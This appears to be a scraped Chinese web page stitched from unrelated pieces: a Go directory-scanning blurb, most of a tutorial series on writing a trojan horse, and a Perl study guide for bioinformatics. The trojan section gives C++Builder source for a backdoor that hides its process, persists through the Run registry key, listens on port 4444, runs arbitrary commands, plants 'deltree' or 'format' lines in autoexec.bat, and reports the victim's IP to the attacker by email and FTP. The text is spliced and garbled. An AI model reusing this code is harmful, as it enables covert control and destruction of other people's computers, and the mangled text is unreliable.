go语言递归扫描指定目录下文件

Python023

go语言递归扫描指定目录下文件,第1张

使用go语言递归查找指定目录下的文件,根据正则匹配筛选出需要的文件,并且忽略指定的目录

先使用 ioutil.ReadDir 遍历出指定目录下的文件,再递归进目录中遍历,问题的关键在于识别出文件为目录, fs.FileInfo 中有一个 IsDir() 函数可以识别是否是目录

正则匹配使用 regexp.MatchString ,regexp中有很多正则操作的工具,如根据正则替换字符串中的指定字符

木马是如何编写的(一)

特洛依木马这个名词大家应该不陌生,自从98年“死牛崇拜”黑客小组公布Back Orifice以来,木马犹如平地上的惊雷,使在Dos??Windows时代中长大的中国网民从五彩缤纷的网络之梦中惊醒,终于认识到的网络也有它邪恶的一面,一时间人心惶惶。

我那时在《电脑报》上看到一篇文章,大意是一个菜鸟被人用BO控制了,吓得整天吃不下饭、睡不着觉、上不了网,到处求救!呵呵,要知道,木马(Trojan)的历史是很悠久的:早在AT&T Unix和BSD Unix十分盛行的年代,木马是由一些玩程式(主要是C)水平很高的年轻人(主要是老美)用C或Shell语言编写的,基本是用来窃取登陆主机的口令,以取得更高的权限。那时木马的主要方法是诱骗??先修改你的.profile文件,植入木马;当你登陆时将你敲入的口令字符存入一个文件,用Email的形式发到攻击者的邮箱里。国内的年轻人大都是在盗版Dos的熏陶下长大的,对网络可以说很陌生。直到Win9x横空出世,尤其是WinNt的普及,大大推动了网络事业的发展的时候,BO这个用三年后的眼光看起来有点简单甚至可以说是简陋的木马(甚至在Win9x的“关闭程序”对话框可以看到进程)给了当时中国人极大的震撼,它在中国的网络安全方面可以说是一个划时代的软件。

自己编写木马,听起来很Cool是不是?!木马一定是由两部分组成??服务器程序(Server)和客户端程序(Client),服务器负责打开攻击的道路,就像一个内奸特务;客户端负责攻击目标,两者需要一定的网络协议来进行通讯(一般是TCP/IP协议)。为了让大家更好的了解木马攻击技术,破除木马的神秘感,我就来粗略讲一讲编写木马的技术并顺便编写一个例子木马,使大家能更好地防范和查杀各种已知和未知的木马。

首先是编程工具的选择。目前流行的开发工具有C++Builder、VC、VB和Delphi,这里我们选用C++Builder(以下简称BCB);VC虽然好,但GUI设计太复杂,为了更好地突出我的例子,集中注意力在木马的基本原理上,我们选用可视化的BCB;Delphi也不错,但缺陷是不能继承已有的资源(如“死牛崇拜”黑客小组公布的BO2000源代码,是VC编写的,网上俯拾皆是);VB嘛,谈都不谈??难道你还给受害者传一个1兆多的动态链接库??Msvbvm60.dll吗?

启动C++Builder 5.0企业版,新建一个工程,添加三个VCL控件:一个是Internet页中的Server Socket,另两个是Fastnet页中的NMFTP和NMSMTP。Server Socket的功能是用来使本程序变成一个服务器程序,可以对外服务(对攻击者敞开大门)。Socket最初是在Unix上出现的,后来微软将它引入了Windows中(包括Win98和WinNt);后两个控件的作用是用来使程序具有FTP(File Transfer Protocol文件传输协议)和SMTP(Simple Mail Transfer Protocol简单邮件传输协议)功能,大家一看都知道是使软件具有上传下载功能和发邮件功能的控件。

Form窗体是可视的,这当然是不可思议的。不光占去了大量的空间(光一个Form就有300K之大),而且使软件可见,根本没什么作用。因此实际写木马时可以用一些技巧使程序不包含Form,就像Delphi用过程实现的小程序一般只有17K左右那样。

我们首先应该让我们的程序能够隐身。双击Form,首先在FormCreate事件中添加可使木马在Win9x的“关闭程序”对话框中隐藏的代码。这看起来很神秘,其实说穿了不过是一种被称之为Service的后台进程,它可以运行在较高的优先级下,可以说是非常靠近系统核心的设备驱动程序中的那一种。因此,只要将我们的程序在进程数据库中用RegisterServiceProcess()函数注册成服务进程(Service Process)就可以了。不过该函数的声明在Borland预先打包的头文件中没有,那么我们只好自己来声明这个位于KERNEL32.DLL中的鸟函数了。

首先判断目标机的操作系统是Win9x还是WinNt:

{

DWORD dwVersion = GetVersion()

// 得到操作系统的版本号

if (dwVersion >= 0x80000000)

// 操作系统是Win9x,不是WinNt

{

typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD)

file://定义RegisterServiceProcess()函数的原型

HINSTANCE hDLL

LPREGISTERSERVICEPROCESS lpRegisterServiceProcess

hDLL = LoadLibrary("KERNEL32")

file://加载RegisterServiceProcess()函数所在的动态链接库KERNEL32.DLL

lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess")

file://得到RegisterServiceProcess()函数的地址

lpRegisterServiceProcess(GetCurrentProcessId(),1)

file://执行RegisterServiceProcess()函数,隐藏本进程

FreeLibrary(hDLL)

file://卸载动态链接库

}

}

这样就终于可以隐身了(害我敲了这么多代码!)。为什么要判断操作系统呢?因为WinNt中的进程管理器可以对当前进程一览无余,因此没必要在WinNt下也使用以上代码(不过你可以使用其他的方法,这个留到后面再讲)。接着再将自己拷贝一份到%System%目录下,例如:C:\Windows\System,并修改注册表,以便启动时自动加载:

{

char TempPath[MAX_PATH]

file://定义一个变量

GetSystemDirectory(TempPath ,MAX_PATH)

file://TempPath是system目录缓冲区的地址,MAX_PATH是缓冲区的大小,得到目标机的System目录路径

SystemPath=AnsiString(TempPath)

file://格式化TempPath字符串,使之成为能供编译器使用的样式

CopyFile(ParamStr(0).c_str(), AnsiString(SystemPath+"\\Tapi32.exe").c_str() ,FALSE)

file://将自己拷贝到%System%目录下,并改名为Tapi32.exe,伪装起来

Registry=new TRegistry

file://定义一个TRegistry对象,准备修改注册表,这一步必不可少

Registry->RootKey=HKEY_LOCAL_MACHINE

file://设置主键为HKEY_LOCAL_MACHINE

Registry->OpenKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run",TRUE)

file://打开键值Software\\Microsoft\\Windows\\CurrentVersion\\Run,如果不存在,就创建之

try

{

file://如果以下语句发生异常,跳至catch,以避免程序崩溃

if(Registry->ReadString("crossbow")!=SystemPath+"\\Tapi32.exe")

Registry->WriteString("crossbow",SystemPath+"\\Tapi32.exe")

file://查找是否有“crossbow”字样的键值,并且是否为拷贝的目录%System%+Tapi32.exe

file://如果不是,就写入以上键值和内容

}

catch(...)

{

file://如果有错误,什么也不做

}

}

好,FormCreate过程完成了,这样每次启动都可以自动加载Tapi32.exe,并且在“关闭程序”对话框中看不见本进程了,木马的雏形初现。

接着选中ServerSocket控件,在左边的Object Inspector中将Active改为true,这样程序一启动就打开特定端口,处于服务器工作状态。再将Port填入4444,这是木马的端口号,当然你也可以用别的。但是你要注意不要用1024以下的低端端口,因为这样不但可能会与基本网络协议使用的端口相冲突,而且很容易被发觉,因此尽量使用1024以上的高端端口(不过也有这样一种技术,它故意使用特定端口,因为如果引起冲突,Windows也不会报错 ^_^)。你可以看一看TNMFTP控件使用的端口,是21号端口,这是FTP协议的专用控制端口(FTP Control Port);同理TNMSMTP的25号端口也是SMTP协议的专用端口。

再选中ServerSocket控件,点击Events页,双击OnClientRead事件,敲入以下代码:

{

FILE *fp=NULL

char * content

int times_of_try

char TempFile[MAX_PATH]

file://定义了一堆待会儿要用到的变量

sprintf(TempFile, "%s", AnsiString(SystemPath+AnsiString("\\Win369.BAT")).c_str())

file://在%System%下建立一个文本文件Win369.bat,作为临时文件使用

AnsiString temp=Socket->ReceiveText()

file://接收客户端(攻击者,也就是你自己)传来的数据

}

好,大门敞开了!接着就是修改目标机的各种配置了!^_^ 首先我们来修改Autoexec.bat和Config.sys吧:

{

if(temp.SubString(0,9)=="edit conf")

file://如果接受到的字符串的前9个字符是“edit conf”

{

int number=temp.Length()

file://得到字符串的长度

int file_name=atoi((temp.SubString(11,1)).c_str())

file://将第11个字符转换成integer型,存入file_name变量

file://为什么要取第11个字符,因为第10个字符是空格字符

content=(temp.SubString(12,number-11)+'\n').c_str()

file://余下的字符串将被作为写入的内容写入目标文件

FILE *fp=NULL

char filename[20]

chmod("c:\\autoexec.bat",S_IREADS_IWRITE)

chmod("c:\\config.sys",S_IREADS_IWRITE)

file://将两个目标文件的属性改为可读可写

if(file_name==1)

sprintf(filename,"%s","c:\\autoexec.bat")

file://如果第11个字符是1,就把Autoexec.bat格式化

else if(file_name==2)

sprintf(filename,"%s","c:\\config.sys")

file://如果第11个字符是1,就把Config.sys格式化

times_of_try=0

file://定义计数器

while(fp==NULL)

{

file://如果指针是空

fp=fopen(filename,"a+")

file://如果文件不存在,创建之;如果存在,准备在其后添加

file://如果出错,文件指针为空,这样就会重复

times_of_try=times_of_try+1

file://计数器加1

if(times_of_try>100)

{

file://如果已经试了100次了,仍未成功

Socket->SendText("Fail By Open File")

file://就发回“Fail By Open File”的错误信息

goto END

file://跳至END处

}

}

fwrite(content,sizeof(char),strlen(content),fp)

file://写入添加的语句,例如deltree/y C:或者format/q/autotest C:,够毒吧?!

fclose(fp)

file://写完后关闭目标文件

Socket->SendText("Sucess")

file://然后发回“Success”的成功信息

}

}

上回我们讲到如何修改目标机上的启动配置文件,这回我们就来查看目标机上的目录树和文件吧,这在客户端上使用“dir”命令,跟着敲?:

{

else if(temp.SubString(0,3)=="dir")

{

file://如果前3个字符是“dir”

int Read_Num

char * CR_LF="\n"

int attrib

char *filename

DIR *dir

struct dirent *ent

int number=temp.Length()

file://得到字符串的长度

AnsiString Dir_Name=temp.SubString(5,number-3)

file://从字符串第六个字符开始,将后面的字符存入Dir_Name变量,这是目录名

if(Dir_Name=="")

{

file://如果目录名为空

Socket->SendText("Fail By Open DIR's Name")

file://返回“Fail By Open DIR's Name”信息

goto END

file://跳到END

}

char * dirname

dirname=Dir_Name.c_str()

if ((dir = opendir(dirname)) == NULL)

{

file://如果打开目录出错

Socket->SendText("Fail by your DIR's name!")

file://返回“Fail By Your DIR's Name”信息

goto END

file://跳到END

}

times_of_try=0

while(fp==NULL)

{

file://如果指针是NULL

fp=fopen(TempFile,"w+")

file://就创建system\Win369.bat准备读和写;如果此文件已存在,则会被覆盖

times_of_try=times_of_try+1

file://计数器加1

if(times_of_try>100)

{

file://如果已经试了100次了,仍未成功(真有耐心!)

Socket->SendText("Fail By Open File")

file://就发回“Fail By Open File”的错误信息

goto END

file://并跳到END处

}

}

while ((ent = readdir(dir)) != NULL)

{

file://如果访问目标目录成功

if(*(AnsiString(dirname)).AnsiLastChar()!='\\')

file://如果最后一个字符不是“\”,证明不是根目录

filename=(AnsiString(dirname)+"\\"+ent->d_name).c_str()

file://加上“\”字符后将指针指向目录流

else

filename=(AnsiString(dirname)+ent->d_name).c_str()

file://如果是根目录,则不用加“\”

attrib=_rtl_chmod(filename, 0)

file://得到目标文件的访问属性

if (attrib &FA_RDONLY)

file://“&”字符是比较前后两个变量,如果相同返回1,否则返回0

fwrite(" R",sizeof(char),3,fp)

file://将目标文件属性设为只读

else

fwrite(" ",sizeof(char),3,fp)

file://失败则写入空格

if (attrib &FA_HIDDEN)

fwrite("H",sizeof(char),1,fp)

file://将目标文件属性设为隐藏

else

fwrite(" ",sizeof(char),1,fp)

file://失败则写入空格

if (attrib &FA_SYSTEM)

fwrite("S",sizeof(char),1,fp)

file://将目标文件属性设为系统

else

fwrite(" ",sizeof(char),1,fp)

file://失败则写入空格

if (attrib &FA_ARCH)

fwrite("A",sizeof(char),1,fp)

file://将目标文件属性设为普通

else

fwrite(" ",sizeof(char),1,fp)

file://失败则写入空格

if (attrib &FA_DIREC)

fwrite(" <DIR>",sizeof(char),9,fp)

file://将目标文件属性设为目录

else

fwrite(" ",sizeof(char),9,fp)

file://失败则写入空格

fwrite(ent->d_name,sizeof(char),strlen(ent->d_name),fp)

file://将目录名写入目标文件

fwrite(CR_LF,1,1,fp)

file://写入换行

}

fclose(fp)

file://关闭文件

closedir(dir)

file://关闭目录

FILE *fp1=NULL

times_of_try=0

while(fp1==NULL)

{

fp1=fopen(TempFile,"r")

file://打开Win369.bat准备读

times_of_try=times_of_try+1

file://计数器加1

if(times_of_try>100)

{

file://如果已经试了100次了,仍未成功

Socket->SendText("Fail By Open File")

file://就发回“Fail By Open File”的错误信息

goto END

file://并跳到END处

}

}

AnsiString Return_Text=""

char temp_content[300]

for(int i=0i<300i++) temp_content[i]='\0'

file://定义的一个空数组

Read_Num=fread(temp_content,1,300,fp1)

file://从目标文件中读入前300个字符

while(Read_Num==300)

{

Return_Text=Return_Text+temp_content

file://Return_Text变量加上刚才的300个字符

for(int i=0i<300i++) temp_content[i]='\0'

Read_Num=fread(temp_content,1,300,fp1)

file://重复

}

Return_Text=Return_Text+temp_content

file://Return_Text变量加上刚才的300个字符

fclose(fp1)

file://关闭目标文件

Socket->SendText(Return_Text)

file://返回Return_Text变量的内容

}

}

够长吧?!察看目录树这么费劲啊?!你后面可以用BCB中的各种列表框对Client.exe好好美化美化。接下来就是查看指定文件的内容了,Client将使用“type”命令,(手指累不累啊?):

{

else if(temp.SubString(0,4)=="type")

{

file://如果前4个字符是“type”

int Read_Num

int number=temp.Length()

AnsiString File_Name=temp.SubString(6,number-4)

file://将目标文件流存入File_Name变量中

times_of_try=0

while(fp==NULL)

{

fp=fopen(File_Name.c_str(),"r")

file://打开目标文件准备读

times_of_try=times_of_try+1

file://计数器加1

if(times_of_try>100)

{

file://如果已试了100次了

Socket->SendText("Fail By Open File")

file://返回“Fail By Open File”的错误信息

goto END

file://跳到END

}

}

AnsiString Return_Text=""

char temp_content[300]

for(int i=0i<300i++) temp_content[i]='\0'

file://定义一个空数组

Read_Num=fread(temp_content,1,300,fp)

file://从目标文件中读入前300个字符

while(Read_Num==300)

{

Return_Text=Return_Text+temp_content

file://Return_Text的内容加上刚才的字符

for(int i=0i<300i++) temp_content[i]='\0'

Read_Num=fread(temp_content,1,300,fp)

file://重复

}

Return_Text=Return_Text+temp_content

file://Return_Text的内容加上刚才的字符

fclose(fp)

file://关闭目标文件

Socket->SendText(Return_Text)

file://返回Return_Text的内容,即你查看文件的内容

}

}

咳咳!累死了!还是来点轻松的吧??操纵目标机的光驱(注意:mciSendString()函数的声明在mmsystem.h头文件中):

{

else if(temp=="open")

{

file://如果收到的temp的内容是“open”

mciSendString("set cdaudio door open", NULL, 0, NULL)

file://就弹出光驱的托盘

}

else if(temp=="close")

{

file://如果收到的temp的内容是“close”

mciSendString("Set cdaudio door closed wait", NULL, 0, NULL)

file://就收入光驱的托盘。当然你也可以搞个死循环,让他的光驱好好活动活动!^_^

}

}

接着就是交换目标机的鼠标左右键,代码如下:

{

else if(temp=="swap")

{

SwapMouseButton(1)

file://交换鼠标左右键,简单吧?

}

}

然后就是使目标机重新启动。但这里要区分WinNt和Win9x??NT非常注重系统每个进程的权利,一个普通的进程是不应具备有调用系统的权利的,因此我们要赋予本程序足够的权限:

{

else if(temp=="reboot")

{

file://如果收到的temp的内容是“temp”

DWORD dwVersion = GetVersion()

file://得到操作系统的版本号

if (dwVersion <0x80000000)

{

file://操作系统是WinNt,不是Win9x

HANDLE hToken

TOKEN_PRIVILEGES tkp

file://定义变量

OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES TOKEN_QUERY, &hToken)

file://OpenProcessToken()这个函数的作用是打开一个进程的访问令牌

file://GetCurrentProcess()函数的作用是得到本进程的句柄

LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid)

file://LookupPrivilegeValue()的作用是修改进程的权限

tkp.PrivilegeCount = 1

file://赋给本进程特权

tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED

AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,(PTOKEN_PRIVILEGES)NULL, 0)

file://AdjustTokenPrivileges()的作用是通知Windows NT修改本进程的权利

ExitWindowsEx(EWX_REBOOT EWX_FORCE, 0)

file://强行退出WinNt并重启

}

else ExitWindowsEx(EWX_FORCE+EWX_REBOOT,0)

file://强行退出Win9x并重启

}

}

如果以上都不是,就让它在Dos窗口中执行传来的命令:

{

else

{

file://如果都不是

char * CR_TF="\n"

times_of_try=0

while(fp==NULL)

{

fp=fopen(TempFile,"w+")

file://创建Win369.bat,如果已存在就覆盖

times_of_try=times_of_try+1

file://计数器加1

if(times_of_try>100)

{

Socket->SendText("Fail By Open File")

file://返回“Fail By Open File”的信息

goto END

file://跳到END

}

}

fwrite(temp.c_str(),sizeof(char),strlen(temp.c_str()),fp)

file://写入欲执行的命令

fwrite(CR_TF,sizeof(char),strlen(CR_TF),fp)

file://写入换行符

fclose(fp)

file://关闭Win369.bat

system(TempFile)

file://执行Win369.bat

Socket->SendText("Success")

file://返回“Success”信息

}

}

你可以直接执行什么Ping和Tracert之类的命令来进一步刺探目标机的网络状况(判断是否是一个企业的局域网),然后可以进一步攻击,比如Deltree和Format命令。^_^

到此,服务器程序的功能已全部完成,但还差容错部分未完成,这样才能避免程序因意外而崩溃。朋友,别走开!(未完待续)

木马是如何编写的(三)

武汉 周侃

上次已编写完服务器端的各种功能,但还差容错部分还未完成,下面我们Go on! 其代码如下(照敲不误 ^_^):

{

END:

Socket->Close()

file://关闭服务

ServerSocket1->Active =true

file://再次打开服务

if (NMSMTP1->Connected) NMSMTP1->Disconnect()

file://如果SMTP服务器已连接则断开

NMSMTP1->Host = "smtp.163.net"

file://选一个好用的SMTP服务器,如163、263、sina和btamail

NMSMTP1->UserID = ""

file://你SMTP的ID

try

{

NMSMTP1->Connect()

file://再次连接

}

catch(...)

{

goto NextTime

file://跳到NextTime

}

NMSMTP1->PostMessage->FromAddress ="I don't know!"

file://受害者的Email地址

NMSMTP1->PostMessage->FromName = "Casualty"

file://受害者的名字

NMSMTP1->PostMessage->ToAddress->Text = "[email protected]"

file://将信发到我的邮箱,这一步很关键

NMSMTP1->PostMessage->Body->Text = AnsiString("Server Running on:") + NMSMTP1->LocalIP

file://信的内容提示你“服务器正在运行”,并且告诉你受害者的目前的IP地址,以便连接

NMSMTP1->PostMessage->Subject = "Server Running Now!"

file://信的主题

NMSMTP1->SendMail()

file://发送!

return

file://返回

NextTime:

NMFTP1->Host = "ftp.go.163.com"

file://你的FTP服务器的地址

NMFTP1->UserID = ""

file://你的用户ID

NMFTP1->Port = 21

file://FTP端口号,一般为21

NMFTP1->Password = ""

file://你的FTP的密码

if(NMFTP1->Connected) NMFTP1->Disconnect()

file://如果已连接就断开

try

{

NMFTP1->Connect()

file://再连接

}

catch(...)

{

return

file://返回

}

AnsiString SendToSite = "Server Running on: " + NMFTP1->RemoteIP

file://受害者的IP地址

FILE * Upload

Upload = fopen(NMFTP1->RemoteIP.c_str(),"w+")

file://创建一个新文件准备写,如果已存在就覆盖

fwrite(SendToSite.c_str(),sizeof(char),SendToSite.Length(),Upload)

file://写入以上的SendToSite的内容

fclose(Upload)

file://写完后关闭此文件

NMFTP1->RemoveDir("public_html")

file://删除public_html目录

NMFTP1->Upload(NMFTP1->RemoteIP, NMFTP1->RemoteIP)

file://上传!

}

啊,超长的OnClientRead事件终于写完了。最后别忘了要在此服务器源码文件中添加以下头文件:

#include <stdlib.h>

#include <dirent.h>

#include <fcntl.h>

#include <dos.h>

#include <sys\stat.h>

#include <winbase.h>

#include <stdio.h>

#include <process.h>

#include <io.h>

#include <mmsystem.h>

至此,服务器端(Server)程序

Perl是典型的脚本语言,短小精悍,非常容易上手,尤其适合处理文本,数据,以及系统管理。它在老一辈的生物信息学分析人员中非常流行,出于历史遗留原因大家肯定会或多或少地接触 Perl,即使你再怎么推崇Python或者GO等新兴编程语言。

1 入门资料

两个半小时入门指导:https://qntm.org/files/perl/perl.html

21天学完 perl,自己搜索下载PDF书籍吧!

大小骆驼书,建议都看完,以囫囵吞枣的方式阅读,只看基础知识来入门,难点全部跳过。

官网:https://www.perl.org/

函数如何用:都可以在http://perldoc.perl.org/perl.html 查到

论坛:http://www.perlmonks.org/

2 知识要点

在看书的同时,你必须记住和熟练使用的知识点是下面这些:

理解perl里面的三种变量表示方式

$ 表示单个变量

用单双引号区别,q(),qq()

@ 表示多个变量组成的数组,qw()

% 表示关系型变量-hash

变量不严格区分类型,没有int/float/double/char这样的概念

三种变量都有对应的操作技巧:

简单变量的操作函数

Numerical operators: <> >, <>>=, ==, !=, <=>, +, *

String operators:lt, gt, le, ge, eq, ne, cmp, ., x

数组操作(pop/push/shift/unshift/splice/map/grep/join/split/sort/reverse)

hash操作方式

(keys,values,each,delete,exists)

具体需要在实战里面体会:http://www.biotrainee.com/forum-90-1.html 生信人必练的200个数据处理任务(欢迎大家去练习)

变量内容交换,字符型转为数值型,字符串转为字符数组,字符串变量,heredoc,字符串分割,字符串截取,随机数生成,取整,各种概率分布数,多维矩阵如何操作,进制转换,hash翻转,数组转hash

上下文环境

这个比较复杂: http://www.perlmonks.org/?node_id=738558,就是需要理解你写的程序是如何判断你的变量的,你以为的不一定是你以为的。

正则表达式

这也是一个非常重要的一块内容,基础用法就是m和s,一个匹配,一个替换,比较有趣的就是1,2等等捕获变量。

内建变量

就是perl语言设计的时候定义了一大堆的全局变量($_ $, $0 $>$<$!="" $.="" @argv="" @f="" @_="" @inc="" %env="">)

。外表上看起来都是一个$ @ %符号后面加上一大堆的奇奇怪怪的字符,表示一些特殊变量,这也是perl语言饱受诟病的原因。但是有些非常重要,懂了它之后写程序会方便。下载一个表格,里面有近100个预定义变量需要学习的。

控制语句(循环/条件/判断)

if ... elsif ... else ...

unless/while/next/last/for/foreach

读写文件,脚本实战!

while(<>){

#do something !

}

这是我最喜欢的一个程序模板,读取文件,根据需要处理文件,然后输出。需要实现非常多的功能,然后就可以自己总结脚本技巧,也能完全掌握perl的各种语法。在生物信息学领域,需要实现的功能有!

perl 单行命令

我个人特别喜欢这个知识点,我也专门下载过一本书来学习,把这个教程看完就基本上能全明白:http://www.catonmat.net/blog/perl-one-liners-explained-part-one/。学习单行命令的前提是掌握非常多的奇奇怪怪的perl自定义变量和perl的基础语法,用熟练了之后就非常方便,很多生物信息学数据处理过程我现在基本不写脚本,都是直接写一行命令,完全代替了shell脚本里面的awk、sed/grep系列命令。(perl -p -a -n -a -l -i -F -M)

预定义函数

perl 是一个非常精简的语言,自定义的函数非常少,连min max这样常见的函数都没有,如果你需要使用这样的功能,要么自己写一个函数,要么使用加强版的包,perl的包非常多。

下面列出一些,我常用的函数:

程序必备: use/die/warn/print/open/close/<>/

数学函数:sin/cos/log/abs/rand/srand/sqrt

字符串函数 :uc/lc/scaler/index/rindex/length/pos/substr/sprintf/chop/chomp/hex/int/oct/ord/chr/unpack/unencode

defined/undef

系统操作相关

perl语言是跨平台的,因为它的执行靠的是perl解释器,而perl的解释器可以安装在任何机器上面。所以可以用perl来代替很多系统管理工作。

系统命令调用

文件句柄操作(STDIN,STDOUT,STDERR,ARGV,DATA,)

系统文件管理(mkdir/chdir/opendir/closedir/readdir/telldir/rmdir/)

一些高级技巧

自定义函数 sub , 参数传递,数组传递,返回值

模块操作(模块安装,加载,模块路径,模块函数引用)

引用(变量的变量)

选择一个好的编辑器-编译器,editplus,notepad++,jEdit,编程习惯的养成。

搞清楚perl版本的问题,还有程序编码的问题,中文显示的问题。

程序调试

perl常见模块学习

perl和LWP/HTML做网络爬虫必备,重点是DOM如何解析;

perl和CGI编程,做网站的神器,重点是html基础知识;

DBI相关数据库,用perl来操作mysql等,当然,重点是mysql知识;

GD and GD::Graph 可以用来画图,但是基本上没有人用了,除了CIRCOS画圈圈图火起来了;

TK模块,可以编写GUI界面程序,但是也几乎没有人用了;

XML/pdf/excel/Json 相关的模块可以用来读取非文本格式数据,或者输出格式化报告;

socket通信相关,高手甚至可以写出一个QQ的模仿版本;

最后不得不提的就是Bioperl了,虽然我从来没有用过,但是它的确对初学者非常有用,大多数人不提倡重复造轮子,但我个人觉得,对初学者来说,重复造轮子是一个非常好的学习方式。大家可以仿造bioperl里面的各个功能,用自己的脚本来实现!

3 复习资料

如果你感觉学的差不多了,就可以下载一些复习资料,查漏补缺:

http://michaelgoerz.net/refcards/perl_refcard.pdf

https://rc.hms.harvard.edu/training/perl/Perl%20Cheat%20Sheet.pdf

https://www.cheatography.com/mishin/cheat-sheets/perl-reference-card/

http://www.catonmat.net/download/perl.predefined.variables.pdf

http://www.erudil.com/preqr.pdf

https://www.cs.tut.fi/~jkorpela/perl/regexp.html

https://support.sas.com/rnd/base/datastep/perl_regexp/regexp-tip-sheet.pdf